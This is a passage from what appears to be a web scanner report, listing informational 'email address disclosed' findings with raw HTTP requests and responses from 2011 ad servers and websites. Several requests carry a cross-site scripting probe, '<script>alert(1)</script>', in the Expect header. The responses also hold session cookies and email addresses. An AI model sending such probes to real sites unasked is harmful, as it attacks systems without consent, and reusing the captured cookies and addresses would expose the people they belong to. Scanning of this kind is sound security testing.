The following email address was disclosed in the response:

Request

GET /adserver/behavioral-data/8201?d=1031 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9jbS5nLmRvdWJsZWNsaWNrLm5ldC9waXhlbD9uaWQ9ZXhlbGF0ZSZqPTAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaW1nPjxpbWcgc3JjPSJodHRwOi8vYWRzLmFkYnJpdGUuY29tL2Fkc2VydmVyL2JlaGF2aW9yYWwtZGF0YS84MjAxP2Q9MTAzMSIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD0xNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=8d858ba9e9afa8b40a627b6ea0e852d0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBj0x-yREyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A6e73"; fq="84fok%2C1uo0%7Clkigxp"; srh="1%3Aq64FAA%3D%3D"; ut="1%3AHY3LDoMgEAD%2FZc8cWGit8W9ArZhusDwqQdd%2FL%2B11Mpk5YVcwnPCaa9nilGCA0bl%2BCdLsjIGWbBlZiqRSRMZ3fXrPhhHzIULQR2lSryOxYryLRDNRIzaXjR%2FcWS1GR91au5tveJIf%2BtVAgDXez3H9D%2BG6vg%3D%3D"; vsd=0@1@4dbe0f2f@loadus.exelator.com

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 02 May 2011 02:00:10 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: ut="1%3AHc1BDoMgEIXhu8yaBQMtNd4GlBbTCRawEnS8e0m33%2F%2BSd8KuYDzh7Vtd81xghCmE4ZWk3RkTBWlZsTlESvqoXQadqQveRVElI%2BOnPWNky4jbIQp5or5yW135wcZpMQUySzO32HmW315ZggBnY%2FR5%2BT%2FCdf0A"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:00:10 GMT
Set-Cookie: vsd=0@2@4dbe102a@loadus.exelator.com; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 02:00:10 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
27.3. http://ads.adbrite.com/adserver/vdi/762701  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/762701

Issue detail

The following email address was disclosed in the response:

Request

GET /adserver/vdi/762701?d=978972DFA063000D2C0E7A380BFA1DEC HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; b="%3A%3A12ggb%2C6e73"; ut="1%3AHY5LEoMgEAXvMmsWDEZDeRtQI1YmEMBPqePdg9l29et6J6wK2hPew76F1GdooXNOj1GalTHSOH9YsRXZqN7cwOnMyJJxCVLEWB1bobpKVDSsRVY5IeN3f3nPZYDzITINRMWy8xb4yY2tROeomfbm4Qvu5UJ3EgRY4%2F2Qpv8NuK4f"; vsd=0@2@4dbe115c@websiteprice.net; fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 02 May 2011 02:21:42 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjAKBjc2MjcwMRiu4KfOEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUQAQ; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:21:42 GMT
Set-Cookie: ut="1%3AHc7LDoMgEIXhd5k1CwarJb4NqBXTKRTwEnV892K3f76TnBNWBe0J72HfQuoztNA5p8cozcoYaZw%2FrNiKrHJCxu%2F%2B8p4NI86HiLE6toJ0laggrEU2qjf3zOnMyJJxCVJkGohKtfMW%2BMmNrUTnqJn25uFL7uVCNwYB1ng%2FpOl%2FA67rBw%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:21:42 GMT
Set-Cookie: vsd=0@3@4dbe1536@websiteprice.net; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 02:21:42 GMT
Set-Cookie: rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:21:42 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
27.4. http://ads2.adbrite.com/v0/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The following email address was disclosed in the response:

Request

GET /v0/ad?sid=1794251&br=1&ifr=1&ref=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934&zx=520&zy=233&ww=1041&wh=903&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A6e73"; fq="84fok%2C1uo0%7Clkigxp"; srh="1%3Aq64FAA%3D%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; ut="1%3AHc3LDoMgEIXhd5k1CwZaanwbUCqmFMulEnR895Juv%2F8k54RdwHjCy7a6pTnDCJNzwxK53gmjX8qbBBkWozxqh0Em3wHvLIuckPDTniGQJsRysOyt931lSt3oQcpINjmv1qZuofPMv70SBwZGh2DT%2Bj%2BE6%2FoB"

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: application/x-javascript
Set-Cookie: b="%3A%3A12ggb%2C6e73"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 02:19:49 GMT
Set-Cookie: ut="1%3AHY1LDoMgFADv8tYseNBS421AqZhSLJ9K0OfdS7qdmWRO2AWMJ7xsq1uaM4wwOTcskeudMPqlvEmQYVnkhISf9gyBNCGWg8Uoj9qjQSbfI7yz7K33nZhSN3qQMpJNzqu1qVvoeObfbokDA6NDsGn9D%2BG6fg%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:19:49 GMT
Set-Cookie: vsd=0@1@4dbe14c5@websiteprice.net; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 02:19:49 GMT
Set-Cookie: fq="84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjqh1%2C826ke%2C1uo0%7Clkjqh1"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 02:19:49 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 02:19:49 GMT
Content-Length: 4307

document.write('<a class=\"adHeadline\" target=\"_top\" onmouseover=\"window.status=\'http://www.cheapezfast.com\'; return true;\" onmouseout=\"window.status=\' \'; return true;\" href=\"http://click.
...[SNIP]...
27.5. http://ads2.adbrite.com/v0/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The following email address was disclosed in the response:

Request

GET /v0/ad?sid=1794248&zs=3330305f323530&ifr=1&ref=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934&zx=430&zy=1263&ww=1041&wh=903&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; b="%3A%3A12ggb%2C6e73"; fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjAKBjc2MjcwMRiN1OvNEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUQAQ; ut="1%3AHc7LDoMgEIXhd5k1CwarJb4NqBXTKRTwEnV892K3f76TnBNWBe0J72HfQuoztNA5p8cozcoYaZw%2FrNiKrHJCxu%2F%2B8p4NI86HiLE6toJ0laggrEU2qjf3zOnMyJJxCVJkGohKtfMW%2BMmNrUTnqJn25uFL7uVCNwYB1ng%2FpOl%2FA67rBw%3D%3D"; vsd=0@3@4dbe115e@websiteprice.net; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: application/x-javascript
Set-Cookie: b="%3A%3A12gg8%2C12ggb%2C6e73"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 02:22:25 GMT
Set-Cookie: rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjYKBjc2MjcwMRCd87L6CRi9rqrOEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKFAoGNzgyNjA2EL3WyKMKGL2uqs4TCjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:22:25 GMT
Set-Cookie: ut="1%3AHY5LEoMgEAXvMmsWDEZDeRtQI1YmEMBPqePdg9l29et6J6wK2hPew76F1GdooXNOj1GalTHSOH9YsRXZqN7cwOnMyJJxCVLEWB1bobpKVDSsRVY5IeN3f3nPZYDzITINRMWy8xb4yY2tROeomfbm4Qvu5UJ3EgRY4%2F2Qpv8NuK4f"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:22:25 GMT
Set-Cookie: vsd=0@4@4dbe1561@websiteprice.net; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 02:22:25 GMT
Set-Cookie: fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C84y2m%2C1uo0%7Clkjqld%2C826ke%2C1uo0%7Clkjpsr"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 02:22:25 GMT
Set-Cookie: rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:22:25 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 02:22:25 GMT
Content-Length: 3164

var AdBrite_Title_Color_Default = '0000FF';
var AdBrite_Text_Color_Default = '000000';
var AdBrite_Background_Color_Default = 'fcfaf3';
var AdBrite_Border_Color_Default = 'fcfaf3';
var AdBrite_URL_Col
...[SNIP]...
27.6. http://cdn.js-kit.com/scripts/comments.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.js-kit.com
Path:   /scripts/comments.js

Issue detail

The following email address was disclosed in the response:

Request

GET /scripts/comments.js HTTP/1.1
Host: cdn.js-kit.com
Proxy-Connection: keep-alive
Referer: http://insurancenewsnet.com/article.aspx?id=257992
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: max-age=259200
Content-Type: application/javascript
Age: 59475
Date: Sun, 01 May 2011 23:33:49 GMT
Last-Modified: Sun, 01 May 2011 06:58:19 GMT
Expires: Wed, 04 May 2011 07:13:56 GMT
Connection: keep-alive
Content-Length: 474074


...[SNIP]...
<support@js-kit.com>
...[SNIP]...
27.7. http://insurancenewsnet.com/styles/maintest.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://insurancenewsnet.com
Path:   /styles/maintest.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/maintest.css HTTP/1.1
Host: insurancenewsnet.com
Proxy-Connection: keep-alive
Referer: http://insurancenewsnet.com/article.aspx?id=257992
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=pddqwnm3cm5gjqvccrmz1345; INNid=pddqwnm3cm5gjqvccrmz1345

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Thu, 12 Aug 2010 17:08:14 GMT
Accept-Ranges: bytes
ETag: "0939f3403acb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:33:12 GMT
Content-Length: 1755

/*
Created by Keith Donegan of Code-Sucks.com
   
    E-Mail: Keithdonegan@gmail.com
   
    You can do whatever you want with these layouts,
    but it would be greatly appreciated if you gave a link
    back to http://www.code-sucks.com
   
*/

/* * { padding: 0; margin: 0; }*/
...[SNIP]...
27.8. http://www.agingass.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.agingass.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.agingass.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.6.34
Date: Sun, 01 May 2011 23:51:09 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Language: en
Expires: Sun, 01 May 2011 23:51:09 GMT
Content-Length: 1021

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<link rev="made" href="mailto:root@ndu031.xpower.net" />
...[SNIP]...
<a href="mailto:root@ndu031.xpower.net">
...[SNIP]...
27.9. http://www.corp.att.com/attsearch/sayt/search-as-you-type.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.corp.att.com
Path:   /attsearch/sayt/search-as-you-type.js

Issue detail

The following email address was disclosed in the response:

Request

GET /attsearch/sayt/search-as-you-type.js HTTP/1.1
Host: www.corp.att.com
Proxy-Connection: keep-alive
Referer: http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; svariants=NA; ECOM_GTM=owaln_osaln; bn_u=6923522882713032529; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; DTAB=Tab=Bus; colam_ctn=l%3Den_US; browserid=A001533839947; fsr.a=1304310800620; foresee.analytics=%7B%22rr_domain%22%3A%22att.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221304310803325_7694%22%7D

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:33:30 GMT
Server: Sun-ONE-Web-Server/6.1
Content-Length: 64961
Content-Type: application/x-javascript
P3p: policyref="http://www.corp.att.com/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Cache-Control: max-age=180, proxy-revalidate
ETag: "5658d9a1-1-fdc1-4db19e7c"
Last-Modified: Fri, 22 Apr 2011 15:27:56 GMT
Accept-Ranges: bytes
X-Cache: HIT from 12.120.79.28
Via: 1.1 12.120.79.28:80 (cache/2.6.2.3.13.ATT)
Connection: keep-alive

/*
* Copyright (C) 2006 Google Inc.
* Additional functionality by Joe D'Andrea, Liquid Joe LLC <joe@liquidjoe.biz>
* Version: 1.0-att
* Updated: 22 October 2009
*
* Licensed under the Apac
...[SNIP]...
27.10. http://www.cosmeticscop.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cosmeticscop.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cosmeticscop.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.cosmeticscop.com&SiteLanguage=1033; path=/
Set-Cookie: EktGUID=86192b3f-96a1-4c58-aae6-ace34af4c08a; expires=Tue, 01-May-2012 23:47:45 GMT; path=/
Set-Cookie: EkAnalytics=newuser; expires=Tue, 01-May-2012 23:47:45 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ak5g2p55u4jtmvbge5by5sfw; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:47:45 GMT
Content-Length: 1295


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<link rel=
...[SNIP]...
<a href="mailto:custserv@paulaschoice.com">custserv@paulaschoice.com</a>
...[SNIP]...
27.11. http://www.crankyape.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crankyape.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.crankyape.com
Proxy-Connection: keep-alive
Referer: http://www.crankyape.com/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 02 May 2011 01:53:20 GMT
Content-Type: text/html
Expires: Sun, 01 May 2011 01:53:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDSARCDQAB=MKADMMGCLDEMBHOGIDLDIPPF; path=/
Vary: Accept-Encoding
Content-Length: 19683

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>Crankyape.com Bank repo rvs, motorcycles, snowmobiles, atvs, boats, trucks, trailers, go karts,
...[SNIP]...
<meta name="author" content="webmaster@crankyape.com">
...[SNIP]...
27.12. http://www.crankyape.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crankyape.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.crankyape.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 999 No Hacking
Server: WebKnight/2.1
Date: Sun, 01 May 2011 23:41:46 GMT
Content-Type: text/html; charset=windows-1252
Content-Length: 2420
Pragma: no-cache
Cache-control: no-cache
Expires: Sun, 01 May 2011 23:41:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<meta name="author" content="webmaster@mrcauction.com" />
...[SNIP]...
27.13. http://www.crankyape.com/javascripts/prototype.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crankyape.com
Path:   /javascripts/prototype.js

Issue detail

The following email address was disclosed in the response:

Request

GET /javascripts/prototype.js HTTP/1.1
Host: www.crankyape.com
Proxy-Connection: keep-alive
Referer: http://www.crankyape.com/
